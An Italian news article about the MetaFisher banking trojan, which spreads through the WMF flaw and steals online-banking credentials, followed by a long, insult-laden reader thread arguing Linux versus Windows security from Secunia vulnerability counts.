Un trojan fa strage di conti bancari

Si diffonde attraverso messaggi di posta elettronica, sfrutta l'exploit WMF e ruba informazioni bancarie. Gli esperti di iDefense lanciano l'allarme: è tra i trojan più complessi mai analizzati


Reston (USA) – Il responsabile dell’ultima epidemia telematica che tiene col fiato sospeso centinaia di migliaia d’utenti è un trojan che sfrutta la falla critica nel formato multimediale WMF utilizzato dai prodotti Microsoft . Finora, stando alle stime di VeriSign , il malware potrebbe avere già infettato un milione di computer.

Riconosciuto da Symantec col nome MetaFisher , questo trojan si diffonde attraverso la posta elettronica: basta che un utente ignaro segua il collegamento all’interno del messaggio e MetaFisher si autoinstalla, trasformando il computer in uno zombie , nome comune per indicare il nodo di una botnet .

Il computer infetto entra infatti a fare parte di un complicato sistema che raccoglie e registra ogni transazione finanziaria e ciascuna procedura d’autenticazione effettuata. I dati raccolti vengono poi spediti ad un webserver remoto, totalmente automatizzato: attraverso un complesso programma in PHP, gli untori riescono a filtrare le informazioni sottratte ed individuare i codici identificativi utilizzati per accedere ai servizi bancari telematici .

Ken Dunham, esperto di sicurezza del team iDefense sostiene che “MetaFisher è tra i trojan più sofisticati mai analizzati”. “Abbiamo visto molti tipi di trojan utilizzati per creare botnet e per spiare le attività degli utenti”, dice Dunham, “ma questo utilizza una tecnica talmente raffinata e sofisticata da fare invidia ad un sistema di gestione dati professionale”.

MetaFisher trasmette dati attraverso una connessione criptata , organizza i dati rubati in base al paese di provenienza e tiene nota dell’entità delle pagine web visitate dall’utente infetto, catalogandole in base alle parole chiave contenute. Inoltre, MetaFisher può modificare il proprio comportamento in qualsiasi momento ricevendo ordini impartiti a distanza.

Naturalmente, la migliore forma di prevenzione contro MetaFisher è l’installazione immediata delle patch di sicurezza che correggono la falla WMF. Inoltre, come consiglia lo stesso Dunham, “bisogna ricordare agli utenti di non aprire nessun collegamento sconosciuto contenuto in messaggi di posta elettronica non sicuri”.

Il trojan, stando al rapporto di iDefense, è attualmente in mano a numerose organizzazioni criminali ed esistono già diverse varianti , progettate per colpire in modo specifico le banche di certi utenti.

Secondo le prime indagini, gli untori si troverebbero prevalentemente in Europa e negli Stati Uniti. Un bollettino di sicurezza di Websense parla poi di un malware assai simile e ne attribuisce la paternità ad un anonimo russo.

La tua email sarà utilizzata per comunicarti se qualcuno risponde al tuo commento e non sarà pubblicato. Dichiari di avere preso visione e di accettare quanto previsto dalla informativa privacy

  • Anonimo scrive:
    VALUTA I FATTI! IE6 sfondato da 23 falli
    Fonte secunia, alcuni falli molto grossima sembra che i vinari ormai ci sianoassuefattiGET THE FACTS !!!
    • Anonimo scrive:
      Re: VALUTA I FATTI! IE6 sfondato da 23 f
      - Scritto da: Anonimo
      Fonte secunia, alcuni falli molto grossi
      ma sembra che i vinari ormai ci siano
      assuefatti

      GET THE FACTS !!!Ma Secunia che attendibilità puo avere? Mica è un ente perfetto. Anzi, forse sotto l'effetto di un bel pò di $$$ dati da google e soci a questi qua, i bug possono anche uscire come funghi.La verità è che ancora nessuno viene pagato per cercare bug in firefox in maniera così maniacale come molti fanno verso IE. Anzi, penso che se ci fosse un'azione efficace di debugging verso la volpe piumata, quel programmatore debugger dovrebbe farlo per lo meno da honolulu; non mi stupirebbe infatti se trovassero fuori casa sua una bella cartolina con 2 pallottole dentro.bye bye pinguazzi
    • pippo75 scrive:
      Re: VALUTA I FATTI! IE6 sfondato da 23 f
      - Scritto da: Anonimo
      Fonte secunia, alcuni falli molto grossi
      ma sembra che i vinari ormai ci siano
      assuefatti

      GET THE FACTS !!!Secondo me molti winari usano firefox/opera/k-meleon/altri.Poi ci sono i fedelissimi........ dopotutto ci sono anche gli interisti........ :-)ciao
  • Anonimo scrive:
    spiegazione sul kernel linux per vinari
    In questo momento, ci dicono i siti autorevoli che sioccupano di sicurezza, il kernel linux 2.6.x ha 13 falleless critical aperte. Si tratta di un software estremamente complesso che funziona su 11 ARCHITETTURE principali, nonche' su molte altre secondarie, tra cui amd32/64,intel32/64, sparc, mips, alpha, arm, ppc, etcIl risultato quindi e' quanto meno eccezionale.Tuttavia si tratta di un software in continuo sviluppo e che, tra l'altro, NESSUNO USA direttamente. Gli utenti linux non usano il kernel cosidetto vanilla sviluppato dal team di kernel.org direttamente, ma il kernel testato dalle varie societa', personalizzato e inserito nelle varie distribuzioni, come per esempio il kernel inserito in Red Hat Enterprise, per citarne una tra tante.Credo che anche un vinaro sappia che gli utenti linuxusano le c.d. distribuzioni, non il kernel scaricato dakernel.org e compilato, non openoffice e firefoxscaricati, etc, ma RedHat, per esempio, che distribuisce il tutto testato e messo in sicurezza,nonche' continuamente aggiornato in modoestremamente efficente, come ci dicono i siti chesi occupano di sicurezza, al contrario di quantoavviene per certe schifezze con decine di falleaperte e aggiornamenti mensili da vergognarsi.Pertanto, se vogliamo sapere quante falle aperte ha il kernel che usano gli utenti di RedHat, per esempio, andiamo su un sito dedicato alla sicurezza e facciamo una ricerca. A quel punto ci accorgiamo che RedHat Enterprise ha in questo momento ZERO FALLE APERTE: questo vuole dire che TUTTO IL SOFTWARE CONTENUTO IN REDHAT, openoffice e firefox compresi, nonche il kernel, e' in questo momento esente da falle note. Il risultato e' quanto meno eccezionale.D'altra parte questo e' normale: si parla di un *nix diclasse media, non di una schifezza come XP. Sitratta di sistemi che devono far girare l'infrastruttura di banche, istituzioni, interi paesi di grandi dimensioni, non di ciofeche per scrivere col vord o giochicchiare.Di conseguenza, verificare il fatto che RedHat Enterprise sia esente da falle, nonostante sia uno dei sistemi server piu usato al mondo, e che lo stessovalga per Debian Sarge, che ha tre fallette lesscritical innocue a fronte di una distribuzione di diecigiga di software per 11 tipi di macchina, e' normale, visto il livello dei sistemi di cui stiamo parlando, assolutamente non confrontabile con schifezze come XP.VALUTA I FATTI !!!non la fuffa della pubblicita' truffa.
    • pippo75 scrive:
      Re: spiegazione sul kernel linux per vin

      Pertanto, se vogliamo sapere quante falle aperte
      ha il kernel che usano gli utenti di RedHat, per
      esempio, andiamo su un sito dedicato alla
      sicurezza e facciamo una ricerca. A quel punto ci
      accorgiamo che RedHat Enterprise ha in questo
      momento ZERO FALLE APERTE: questo vuole dire chepremesso che non conosco RedHat Enterprise, ma se non sbaglio la Versione WS contiene anche pacchetti per uso dekstop quindi penso che contenga anche programmi come Firefox e openoffice.Se nella versione propria ha corretto tutte le falle, visto che sta usando programmi nati da altri allora non sarebbe bello che comunicasse agli sviluppatori ufficiali come ha fatto queste correzioni.Magari lo ha gia' fatto e quindi questo discorso non c'entra, pero' visto che cercando FireFox nel database di secunia falle se ne trovano ancora.....

      Di conseguenza, verificare il fatto che RedHat
      Enterprise sia esente da falle, nonostante sia
      uno dei sistemi server piu usato al mondo, e che
      lo stessoParagonare Sistemi Server con sistemi Client.......cmq anche windows 2003 server non sembra esente da bug :-).
      VALUTA I FATTI !!!
      non la fuffa della pubblicita' truffa.Xp per quello che serve se usato bene non da problemi, Se poi si ascolta solo il venditore............
      • Anonimo scrive:
        Re: spiegazione sul kernel linux per vin
        - Scritto da: pippo75

        Pertanto, se vogliamo sapere quante falle aperte

        ha il kernel che usano gli utenti di RedHat, per

        esempio, andiamo su un sito dedicato alla

        sicurezza e facciamo una ricerca. A quel punto
        ci

        accorgiamo che RedHat Enterprise ha in questo

        momento ZERO FALLE APERTE: questo vuole dire che

        premesso che non conosco RedHat Enterprise, ma se
        non sbaglio la Versione WS contiene anche
        pacchetti per uso dekstop quindi penso che
        contenga anche programmi come Firefox e
        openoffice.

        Se nella versione propria ha corretto tutte le
        falle, visto che sta usando programmi nati da
        altri allora non sarebbe bello che comunicasse
        agli sviluppatori ufficiali come ha fatto queste
        correzioni.

        Magari lo ha gia' fatto e quindi questo discorso
        non c'entra, pero' visto che cercando FireFox nel
        database di secunia falle se ne trovano
        ancora.....






        Di conseguenza, verificare il fatto che RedHat

        Enterprise sia esente da falle, nonostante sia

        uno dei sistemi server piu usato al mondo, e che

        lo stesso

        Paragonare Sistemi Server con sistemi
        Client.......

        cmq anche windows 2003 server non sembra esente
        da bug :-).


        VALUTA I FATTI !!!

        non la fuffa della pubblicita' truffa.

        Xp per quello che serve se usato bene non da
        problemi,

        Se poi si ascolta solo il venditore............quando viene classificata "red hat " si intende "red hat + firefox con patch date da mozilla ed applicate da redhat".Questo vuol dire che in ogni caso firefox presenta le falle "originarie"(se queste non sono state chiuse).Se poi redhat NON applica le parch di mozilla allora risultano "unpatched".In ogni caso,paragonare un kernel di un so con un browserè da PAZZI
        • pippo75 scrive:
          Re: spiegazione sul kernel linux per vin

          quando viene classificata "red hat " si intende
          "red hat + firefox con patch date da mozilla ed
          applicate da redhat".allora visto che firefox non e' esente da bug aperti, nel caso in cui redhat usi FF non sarebbe esente a bug.
          • Anonimo scrive:
            Re: spiegazione sul kernel linux per vin
            - Scritto da: pippo75


            quando viene classificata "red hat " si intende

            "red hat + firefox con patch date da mozilla ed

            applicate da redhat".

            allora visto che firefox non e' esente da bug
            aperti, nel caso in cui redhat usi FF non sarebbe
            esente a bug.
            no..credo che i bug considerati da secuina sono quelli imputabili SOLO alla casa....(ma il dfiscorso è generico e vale per tutti i software elencati).CMq fare un paragone buchi tra giga e giga di software e un sistema con giusto 3-4 applicativi(windows)è impossibile.
          • pippo75 scrive:
            Re: spiegazione sul kernel linux per vin



            no..credo che i bug considerati da secuina sono
            quelli imputabili SOLO alla casa....(ma il
            dfiscorso è generico e vale per tutti i software
            elencati).CMq fare un paragone buchi tra giga e
            giga di software e un sistema con giusto 3-4
            applicativi(windows)è impossibile.allora non e' esente, dopotutto chi crea una distro dovrebbe sapere che piu' programmi ci mette e piu' bug avra'.Una ditta seria dovrebbe pensare a tutti i bug dei programmi che distribuisce e se una distro contiene 100000000 programmi....... forse ogni tanto converrebbe sfoltire i rami.
          • Anonimo scrive:
            Re: spiegazione sul kernel linux per vin
            - Scritto da: pippo75





            no..credo che i bug considerati da secuina sono

            quelli imputabili SOLO alla casa....(ma il

            dfiscorso è generico e vale per tutti i software

            elencati).CMq fare un paragone buchi tra giga e

            giga di software e un sistema con giusto 3-4

            applicativi(windows)è impossibile.


            allora non e' esente, dopotutto chi crea una
            distro dovrebbe sapere che piu' programmi ci
            mette e piu' bug avra'.guarda,è molto semplice il discorso:una ditta ti offre un tot di pacchetti,è "come se" tu andassi a prenderli dai produttori,solo che è tutto più semplcie visto che non fai sforzi.Non è che ti INSTALLA tutti i software,sei TU che li installi.

            Una ditta seria dovrebbe pensare a tutti i bug
            dei programmi che distribuisce e se una distro
            contiene 100000000 programmi....... forse ogni
            tanto converrebbe sfoltire i rami.
        • Anonimo scrive:
          Re: spiegazione sul kernel linux per vin

          paragonare un kernel di un so
          con un browserè da PAZZIovvio, ma qui stiamo parlando di modelli di sicurezzaAvviene cosi':esce un problema in ff 1.0.xin redhat, per esempio, c'e' proprio ff 1.0.x, quindiuna versione che ha la falla in oggetto: i mantenitoridel pacchetto ff di redhat (o di debian o altro) collaborano con quelli di ff e gli altri per risolvere il problema, poi generano la patch per la lorodistro in qualche oralo stesso vale per il kernel e per ogni altro pacchettosi chiama opensource ed e' un modello di sviluppodel software: forse ne avete avuto notizia anche voie' universalmente accettato che questo modello disicurezza funziona in modo insuperato: ovvero i vinariincalliti, di enorme livello, non i vinari poveretti di pi, lo invidiano come un ideale per ora irraggiungibile
      • Anonimo scrive:
        Re: spiegazione sul kernel linux per vin

        FireFox nel database di secunia falle se ne trovano
        ancora.....la versione di ff in rh enterprise non e' la stessa, mauna un po' vecchiotta pero' senza falle apertec'e' naturalmente un dialogo continuo tra i team di sicurezza delle distro, nelle persone dei mantenitori dei vari pacchetti, e i produttori dei vari sw, in questocaso ff: diciamo che rh enterprise mantiene una version 1.0.x, con meno ficiurs dell'ultima, maben patchata, e lo stesso vale per ooffice e pertutto il resto, nonchè per i pacchetti debian.ciao
    • Anonimo scrive:
      Re: spiegazione sul kernel linux per vin
      - Scritto da: Anonimo
      In questo momento, ci dicono i siti autorevoli
      che si
      occupano di sicurezza, il kernel linux 2.6.x ha
      13 falle
      less critical aperte. Il kernel è solo una minima parte di un sistema operativo. Basta una falla in una dei tanti pacchetti di una distribuzione di linux per avere lo stesso una vulnerabilità
      • Anonimo scrive:
        Re: spiegazione sul kernel linux per vin

        Basta una falla in una dei tanti pacchettiE' vero: quindi andiamo a vedere quante falle hannoi pacchetti di Red Hat EnterpriseZEROandiamo a vedere quante falle hanno ipacchetti di Debian Stable3 less critical su dieci giga di pacchetti per11 tipi di macchineandiamo a vedere quante falle ha xp pro:alcune decine su poche centinaia di mega diprogrammi: una schifezza, se confrontata congli standard di sicurezza degli *nixquindi, facciamo una cosa dettata dal buon senso:iniziamo a imparare ad usare sistemi seri, non e'difficile. Pensa che ci riescono alcune miliardate didi cinesi e coreani.
    • sathia scrive:
      Re: spiegazione sul kernel linux per vin

      Tuttavia si tratta di un software in continuo
      sviluppo e che, tra l'altro, NESSUNO USA
      direttamente. Gli utenti linux non usano il
      kernel cosidetto vanilla sviluppato dal team di
      kernel.org direttamente, ma il kernel testato
      dalle varie societa'il mio kernel è vanilla, Slackware!
  • Anonimo scrive:
    [OT] IE7 renderizza i CSS meglio di FFOX
    Dimostrato sui CSS ZenGarden...E direi che con quest'ultimo colpo Firefottimi ha chiuso.... http://blogs.msdn.com/ie/archive/2006/03/23/559409.aspx
    • Anonimo scrive:
      Re: [OT] IE7 renderizza i CSS meglio di

      Dimostrato sui CSS ZenGarden...come no, da una fonte indipendente vero ?aspetta un mesetto e avrai i primi exploit per l'ennesima schifezza di ballmer, poi ne riparliamo
    • Anonimo scrive:
      Re: [OT] IE7 renderizza i CSS meglio di
      - Scritto da: Anonimo

      Dimostrato sui CSS ZenGarden...

      E direi che con quest'ultimo colpo Firefottimi ha
      chiuso....

      http://blogs.msdn.com/ie/archive/2006/03/23/559409Confermo. Il team di IE7 ha fatto un ottimo lavoro.
  • Anonimo scrive:
    9 --
  • Anonimo scrive:
    Thunderbird = meno spam
    Grazie all'impostazione di default che non carica immagini remote visualizzando le e-mail, si evita di confermare involontariamente la validità della propria e-mail agli spammer. Anche sul mio indirizzo e-mail più spammato ho avuto un calo dello spam di oltre il 50%.
    • Anonimo scrive:
      Re: Thunderbird = meno spam
      - Scritto da: Anonimo
      Grazie all'impostazione di default che non carica
      immagini remote visualizzando le e-mail, si evita
      di confermare involontariamente la validità della
      propria e-mail agli spammer. Anche sul mio
      indirizzo e-mail più spammato ho avuto un calo
      dello spam di oltre il 50%.Quella impostazione c'è anche abilitata di default in Outlook Express di Windows XP SP2
      • Anonimo scrive:
        Re: Thunderbird = meno spam

        Quella impostazione c'è anche abilitata di
        default in Outlook Express di Windows XP SP2Considerando l'enorme diffusione di Windows 2000, converrai con me che OE su XP SP2 non ce l'hanno tutti. Meglio Thunderbird.
    • Anonimo scrive:
      Re: Thunderbird = meno spam
      - Scritto da: Anonimo
      Grazie all'impostazione di default che non carica
      immagini remote visualizzando le e-mail, si evita
      di confermare involontariamente la validità della
      propria e-mail agli spammer. Anche sul mio
      indirizzo e-mail più spammato ho avuto un calo
      dello spam di oltre il 50%.Scusa, cosa cavolo c'entra con la notizia della falla di IE? :o
      • Anonimo scrive:
        Re: Thunderbird = meno spam
        - Scritto da: Anonimo

        - Scritto da: Anonimo

        Grazie all'impostazione di default che non
        carica

        immagini remote visualizzando le e-mail, si
        evita

        di confermare involontariamente la validità
        della

        propria e-mail agli spammer. Anche sul mio

        indirizzo e-mail più spammato ho avuto un calo

        dello spam di oltre il 50%.

        Scusa, cosa cavolo c'entra con la notizia della
        falla di IE?
        :oPerché spesso l'utente utilizza i programmi in accoppiata, IE+OE oppure FF+TB o magari Opera+Agent, etc, di sicuro le prime due combinazioni prevalgono su soluzioni ibride... alla fine però si ha una situazione generale dove MS peggio di chiunque altro ha chiuso la stalla dopo che erano scappati i buoi.
  • Anonimo scrive:
    e basta
    ormai ogni 2 giorni co ste falle di ie... si sa è un lurido sterco malcagato dal culo di billiponti... solo che anziche finire in un cesso finisce dentro i vostri os che si riempiono di porcate e contaminano la rete mondiale... siamo stufi di vedere gli IDS pieni di merdate x colpa vostra. SVEGLIATEVI BABBUINI!
    • robadamatti scrive:
      Re: e basta
      un po' diretta ma hai perfettamente ragione.E' bello vedere anche persone che lavorano nel settore, felici del loro Windows, superesperti, e poi ... fai a mettere le mani nei loro PC e scopri virus, dialer, etc. e loro che nemmeno se ne accorgono.In fondo sono divertenti... ormai li vedo come bambini che hanno confuso il gioco con il lavoro e la professionalita'.Che vuoi ... purtroppo l'Italia e' anche questa.
  • robadamatti scrive:
    Per i winari
    e per quello che indica vulnerabilita' di Linux ... senza sapere nulla.Partiamo da qui':http://secunia.com/product/2719/Linux e' un KERNEL e non un SO (per essere tale viene associato a software che rende il PC utilizzabile) e in quel caso e' una distribuzione.Linux (il kernel) ha un 18% di vulnerabilita' ancora aperte.http://secunia.com/graph/?type=sol&period=all&prod=2719Se si vanno ad analizzare queste vulnerabilita' si scopre che sono TUTTE non gravi.http://secunia.com/graph/?type=cri&period=all&prod=2719Andiamo a Windows XP ...http://secunia.com/product/22/e qui si scopre che ha un 22% di vulnerabilita' aperte di cui un 34% molto GRAVE.Considerando che Linux e' un kernel in costante evoluzione ... con funzionalita' aggiunte successivamente (vedi SELinux, driver, varie innovazioni) e che e' gratuito a differenza di Windows XP (statico ... sempre lui) mi stupisco ancora nel vedere gente che di fronte a questi numeri ha ancora il coraggio di aprir bocca.Le cose sono 2: o siete ignoranti o stupidi (ma la colpa non e' vostra ...)
    • robadamatti scrive:
      Re: Per i winari
      analizziamo IE e firefox... interessante anche questo:http://secunia.com/product/11/IE: 38% di vulnerabilita' e di queste un bel 43% molti gravi!http://secunia.com/product/4227/Firefox:11% di vulnerabilita' e di queste un 30% gravi (ma gia' corrette).La stessa Secunia da Firefox come piu' sicuro rispetto a IE6.Ora ... considerando che una la pagate e non vi fornisce la stessa assistenza dell'altra ... per quali motivi criticare l'ottimo lavoro di persone molto piu' competenti di voi sparagestionali, copia incolla a 50 euro, o 4 clic per DHCP a 300 euro ?Il buon senso suggerirebbe a queste persone di non parlare se non si conoscono le cose.Ma il buon senso purtroppo oggi non e' da tutti ... meglio un sano grande fratello ... 4 clic, 1 giochino e 20 pubblicita' raccontaballe Microsoft ed e' tutto risolto (lo dice la TV! vero?).
      • Anonimo scrive:
        Re: Per i winari
        io che sono il winaro bravo bravo bravo bravo dico che non e' vero perche' non posso fare tanti giochini con il linus.
      • Anonimo scrive:
        Re: Per i winari

        Il buon senso suggerirebbe a queste persone di
        non parlare se non si conoscono le cose.
        Ma il buon senso purtroppo oggi non e' da tutti
        ... meglio un sano grande fratello ... 4 clic, 1
        giochino e 20 pubblicita' raccontaballe Microsoft
        ed e' tutto risolto (lo dice la TV! vero?).Vai a cagare...
        • robadamatti scrive:
          Re: Per i winari
          con questa tua risposta mi hai quasi convinto a passare a Windows !Ricambio con piu' educazione.E' bello vedere quanto vi arrabbiate quando vi si pone di fronte ai fatti.
          • Anonimo scrive:
            Re: Per i winari
            - Scritto da: robadamatti
            con questa tua risposta mi hai quasi convinto a
            passare a Windows !
            Ricambio con piu' educazione.
            E' bello vedere quanto vi arrabbiate quando vi si
            pone di fronte ai fatti.Ma chi ti credi di essere?
          • Anonimo scrive:
            Re: Per i winari

            Ma chi ti credi di essere? per aver fatto cosa? ... cioe' fammi capire ... quando uno vi mette di fronte ai fatti, quest'uno deve per forza credere di essere chissa' chi?
        • Anonimo scrive:
          Re: Per i winari
          non sai come ribattere vero?
    • Anonimo scrive:
      Re: Per i winari
      - Scritto da: robadamatti
      Linux (il kernel) ha un 18% di vulnerabilita'
      ancora aperte.
      Andiamo a Windows XP ...
      http://secunia.com/product/22/
      e qui si scopre che ha un 22% di vulnerabilita'
      aperte di cui un 34% molto GRAVE.ma che paragone fai, quello di confrontare un kernel (linux) con un intero sistema operativo (windows xp)?E' scontato che in kernel il numero di falle sia minore dato che le linee di codice sono molto molto inferiori rispetto ad un intero sistema operativo.
      • Anonimo scrive:
        Re: Per i winari
        questo era ovvio (e l'ho scritto anche in risposta ad un winaro convinto)... ma volevo chiarire anche il concetto che Linux e' un kernel in barba a chi ha confrontato il kernel con un browser.In ogni caso si recupera con un intero sistema operativo OK?Prendiamo Ubuntu 5.10 (cosi' ci togliamo ogni dubbio):http://secunia.com/product/6606/Vulnerabilita' scoperte: 0% (ZERO)Critiche gravi? NESSUNA (e non c'e' mai stata)Oltre il 50% era a citicita' molto bassa.Windows XP PRO (http://secunia.com/product/22/)Vulnerabilita' scoperte: 22% !!!!! (Ubuntu e' a 0%)Oltre il 34% sono GRAVI !!! OK?
        • Anonimo scrive:
          Re: Per i winari

          Prendiamo Ubuntu 5.10 (cosi' ci togliamo ogni
          dubbio):
          http://secunia.com/product/6606/Perché non lo caga nessuno (0.00001% degli utenti di PC), è un po' come voler scrivere un virus per OSX..... chissenefrega?
          • Anonimo scrive:
            Re: Per i winari

            Perché non lo caga nessuno (0.00001% degli utenti
            di PC), è un po' come voler scrivere un virus per
            OSX..... chissenefrega?anche questo e' sbagliato e continuate a parlare a vanvera. Sparate cifre a caso ... senza documentarle ma facendo ipotesi ovviamente di parte (tipico di chi si arrampica sugli specchi).Non avete ancora capito che non e' documentabile l'effettivo utilizzo di Linux (lato Desktop) perche' non ha mercato ... nessuno conta gli utilizzatori! Ubuntu e' la distribuzione piu' utilizzata e conosciuta come puoi vedere da qui (e negli ultimi tempi la diffusione aumenta):http://distrowatch.com/Ovviamente non essendoci mercato (e' gratuita) e' possibile solo capire quanto e' diffusa dai download o dalle richieste di CD che ci sono.Alla Canonical Ltd che finanzia Ubuntu, non credo siano tutti fessi come dici tu a finanziare una distro utilizzata allo 0.00001% (come dici tu).Potresti quindi proporti tu visto che sei piu' bravo ... Facile dire poi e' poco diffuso quando non c'e' libero mercato ma quando invece l'utonto acquista un PC con la vostra beneamata schifezza preinstallata negandogli la scelta!Lato server, quando questo obbligo non c'e' e ci sono meno utonti e dati alla mano... si nota la vera differenza: Linux/Unix surclassano Windows.Quindi: fatti il piacere di informarti meglio prima di fare figuracce da pagliaggio giocherellone... che adora Windows e Bill solo perche' gli da i giochini.
          • Anonimo scrive:
            Re: Per i winari

            anche questo e' sbagliato e continuate a parlare
            a vanvera. Sparate cifre a caso ... senza
            documentarle ma facendo ipotesi ovviamente di
            parte (tipico di chi si arrampica sugli specchi).
            Non avete ancora capito che non e' documentabile
            l'effettivo utilizzo di Linux (lato Desktop)
            Se VOI volete che NOI smettiamo di affermare che nessuno usa linux potreste iniziare a smettere di parlare di monopolio e monopolisti.&C.
          • Anonimo scrive:
            Re: Per i winari

            Se VOI volete che NOI smettiamo di affermare che
            nessuno usa linux potreste iniziare a smettere di
            parlare di monopolio e monopolisti.&C.guarda che tu sei libero di dire le scemenze che vuoi. La differenza sta nel fatto che lo 0.00001% e' una sciocchezza e il monopolio e i monopolisti sono una realta'.Ma il discorso non e' in base a monopoli o meno ma in base a qualita' di prodotti e a non liberta' del mercato.Perche' se vado ad acquistare un PC devo essere obbligato ad acquistare una licenza Windows anche se non lo uso? Questo e' scorrettissimo!Perche' un prodotto che qualitativamente e' superiore (lo dimostrano i fatti) deve per questi motivi non emergere?Poi se si vuole continuare a trollare facendosi del male da soli (il tuo caso) fai come vuoi.Puoi anche dire che linux e' usato allo 0% a me non interessa... anzi se devo dire il vero mi fa piacere vedere la quantita' di utonti che si definiscono informatici (senza aver studiato) ... vorra' dire che se i livelli sono questi e c'e' meritocrazia faro' strada...
          • Anonimo scrive:
            9 --
          • Anonimo scrive:
            Re: Per i winari

            chissenefreganon sforzare troppo il piccolo neurone solitario chea volte ti infastidisce con la sua non richiesta attivita'con argomenti cosi difficili e articolati, se non vuoifinire nel posto in cui dovresti essere se non ci fossela 180
    • Anonimo scrive:
      Re: Per i winari
      E ci risiamo coi soliti insulti..."La vulnerabilità, che un aggressore potrebbe sfruttare inducendo un utente a visitare un sito web dannoso..."Ergo: c'è molto spesso (quasi sempre) una responsabilità diretta di chi naviga nel cuccarsi problemi (sia con Windows che con Linux).
      • Anonimo scrive:
        Re: Per i winari

        inducendo un utentehai proprio ragione, capito su una pagina webmentre navigo con quella fetecchia di ie6 (non confirefox per fortuna) e il mio computer diventa unozombie, e per di piu sarebbe colpa mia ?se non ho la laurea in informatica e non vado tuttii giorni su dieci siti di sicurezza a vedere le ultimefalle delle schifezze della microsoft e' colpa mia ?se sono aperte per anni e' colpa miacerto che hai una bella faccia tosta tu !!la realta' ai tuoi occhi non significa niente, ragionia pubblita' e fuffa di redmondcomplimenti
      • Anonimo scrive:
        Re: Per i winari
        Ben detto!
      • Anonimo scrive:
        Re: Per i winari
        ma quali insulti? chi ho insultato? ma sei fuori?ho solo riportato dei dati dimostrando che le sciocchezza che mettono in giro certi troll sono false.Da quando in qua' chi riporta dati insulta?(e ora non mi tirate fuori la storia di Berlusconi che non centra nulla)
  • Anonimo scrive:
    debian 3 fallette aperte IE6 20 aperte
    Si ricorda che debian sarge contiene svariati giga disoftware, eppure al momento ha solo 3 falle aperteless criticalIE6, pur essendo solo un browser di un centinaio di mega ha 20 falle aperte, alcune delle quali gravissimeNon ascoltare la fuffa della pubblicita' truffaVALUTA I FATTI !!!!Debian GNU/Linux 3.1 with all vendor patches installed and all vendor workarounds applied, is currently affected by one or more Secunia advisories rated Less criticalThis is based on the most severe Secunia advisory, which is marked as "Unpatched" in the Secunia database. Go to Unpatched/Patched list below for details.Currently, 3 out of 272 Secunia advisories, are marked as "Unpatched" in the Secunia database.Microsoft Internet Explorer 6.x with all vendor patches installed and all vendor workarounds applied, is currently affected by one or more Secunia advisories rated Extremely criticalThis is based on the most severe Secunia advisory, which is marked as "Unpatched" in the Secunia database. Go to Unpatched/Patched list below for details.Currently, 20 out of 96 Secunia advisories, are marked as "Unpatched" in the Secunia database.
    • Anonimo scrive:
      Re: debian 3 fallette aperte IE6 20 aper
      - Scritto da: Anonimo
      Si ricorda che debian sarge contiene svariati
      giga di
      software, eppure al momento ha solo 3 falle aperte
      less criticalè bello credere che sia così. ;)
      • Anonimo scrive:
        Re: debian 3 fallette aperte IE6 20 aper

        è bello credere che sia così. ;)non si tratta di credere, come fai per esempiotu che una schifezza come xp o ie siano robadecente, ma di dati certificati da societa' autorevoliGET THE FATCS !!!!! poveretto
    • Anonimo scrive:
      Re: debian 3 fallette aperte IE6 20 aper
      - Scritto da: Anonimo
      Si ricorda che debian sarge contiene svariati
      giga di
      software, eppure al momento ha solo 3 falle aperte
      less criticale se si considera che due sono di firefoxhttp://secunia.com/product/4227/vuol dire che solo un'altro programma e' buggato.
  • Anonimo scrive:
    redhat: 0 falle aperte xp pro: 28 aperte
    The Secunia database currently contains 0 Secunia advisories marked as "Unpatched", which affects RedHat Enterprise Linux WS 4.Microsoft Windows XP Professional with all vendor patches installed and all vendor workarounds applied, is currently affected by one or more Secunia advisories rated Highly critical.This is based on the most severe Secunia advisory, which is marked as "Unpatched" in the Secunia database. Go to Unpatched/Patched list below for details.Currently, 28 out of 130 Secunia advisories, are marked as "Unpatched" in the Secunia database.Si ricorda che Redhat enterprise workstation contienemolti gigabytes di software, mentre xp pro e' solo unsistema operativo da poche centinaia di megaNon ascoltare la fuffa della pubblicita' truffaVALUTA I FATTI !!!
    • Anonimo scrive:
      Re: redhat: 0 falle aperte xp pro: 28 ap
      - Scritto da: Anonimo
      The Secunia database currently contains 0 Secunia
      advisories marked as "Unpatched", which affects
      RedHat Enterprise Linux WS 4.è bello credere che sia così ;)
      • Anonimo scrive:
        Re: redhat: 0 falle aperte xp pro: 28 ap
        - Scritto da: Anonimo

        - Scritto da: Anonimo

        The Secunia database currently contains 0
        Secunia

        advisories marked as "Unpatched", which affects

        RedHat Enterprise Linux WS 4.

        è bello credere che sia così ;)dimostra il contrario, trolletto ;)
        • pippo75 scrive:
          Re: redhat: 0 falle aperte xp pro: 28 ap



          RedHat Enterprise Linux WS 4.



          è bello credere che sia così ;)

          dimostra il contrario, trolletto ;) nella pagina http://www.securityfocus.com/bid/15049Published: Oct 10 2005 12:00AMUpdated: Mar 24 2006 09:24PMtrovi anche:RedHat Enterprise Linuxcompreso RedHat Enterprise Linux WS 4ciaops. credevo che l'articolo parlasse di IE......
          • Anonimo scrive:
            Re: redhat: 0 falle aperte xp pro: 28 ap

            trovi anche:
            RedHat Enterprise LinuxSei in ritardo di alcuni mesihttp://rhn.redhat.com/errata/RHSA-2005-808.htmlhttp://rhn.redhat.com/errata/RHSA-2006-0101.htmlSe secunia in questo momento dice che rh entepriseha ZERO FALLE APERTE, qualcosa vorra' dire,non credi ?Se poi parliamo di browser solamente il risultato e' ilseguente:firefox 1.0.1 in redhat enterprise, FALLE APERTE ZERO, IE6, falle aperte alcune decine, tra le qualialcune molto gravi.Gli specchi sono molto scivolosi.
      • Anonimo scrive:
        Re: redhat: 0 falle aperte xp pro: 28 ap
        mi chiedo ... ma come fate a negare anche i fatti?cio' vuol dire proprio avere i paraocchi o...essere stupidi.
  • Anonimo scrive:
    Chi ha Mcafee Antivirus NON è affetto
    http://vil.nai.com/vil/content/v_130621.htmJS/Exploit-BO.gen detection is being updated to cover proof of concept code released today that exploits a recent 0-day vulnerability, Microsoft Internet Explorer "createTextRange()" Code Execution. This change will be represented in the 4725 DAT files and does not cover DoS versions of the exploit, only known code execution exploits.Due to the fact that Internet Explorer (IE) executes scripts prior to writing them to disk (stored in IE's internal cache), McAfee VirusScan's ScriptScan (VSE8.0i feature) must be enabled to protect vulnerable clients that access an exploit from a malicious website. Files saved to disk prior to being opened by IE would be detected by the On Access Scanner. Email and gateway scanners would also protect by detecting recognized exploits prior to execution.
  • Anonimo scrive:
    lavoro per sverminatori di frattaglie ms
